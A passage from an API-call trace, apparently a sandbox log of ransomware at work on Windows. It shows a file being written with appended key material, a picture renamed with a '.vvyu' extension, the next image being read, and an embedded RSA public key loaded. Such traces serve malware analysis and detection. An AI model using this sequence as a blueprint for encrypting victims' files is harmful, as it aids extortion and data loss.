[0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ee0 [0193.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f40 [0193.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0193.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f58 [0193.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ef8 [0193.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ec8 [0193.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41fe0 | out: hHeap=0x6a0000) returned 1 [0193.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.425] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x137d6, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x137d6, lpOverlapped=0x0) returned 1 [0193.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.426] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x137db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.426] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.428] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.429] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.429] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.429] CloseHandle (hObject=0x584) returned 1 [0193.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47828 [0193.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d49778 [0193.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47828 | out: hHeap=0x6a0000) returned 1 [0193.431] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\k1TTTQU2.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e5ucc4gr1z tmgype\\k1tttqu2.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\k1TTTQU2.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e5ucc4gr1z tmgype\\k1tttqu2.bmp.vvyu")) returned 1 [0193.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.443] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.446] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce2ba10, ftCreationTime.dwHighDateTime=0x1d8a1f9, ftLastAccessTime.dwLowDateTime=0x164b5600, ftLastAccessTime.dwHighDateTime=0x1d8a429, ftLastWriteTime.dwLowDateTime=0x164b5600, ftLastWriteTime.dwHighDateTime=0x1d8a429, nFileSizeHigh=0x0, nFileSizeLow=0x621a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QjVfzvvW_idBuK5j3vJ1.gif", cAlternateFileName="QJVFZV~1.GIF")) returned 1 [0193.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.447] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\QjVfzvvW_idBuK5j3vJ1.gif") returned=".gif" [0193.447] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\QjVfzvvW_idBuK5j3vJ1.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e5ucc4gr1z tmgype\\qjvfzvvw_idbuk5j3vj1.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.448] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=25114) returned 1 [0193.448] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.450] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x61f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.451] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.452] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.453] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x621a, lpOverlapped=0x0) returned 1 [0193.453] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.454] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.454] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.454] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.455] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.455] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.455] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.455] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.455] GetLastError () returned 0x0 [0193.455] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.455] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.455] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.455] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.455] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6220) returned 0x2d49778 [0193.456] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41fe0 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42028 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ee0 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.456] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0193.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ef8 [0193.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39ee0 [0193.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0193.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0193.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.459] GetCurrentThreadId () returned 0x264 [0193.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45c10 [0193.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 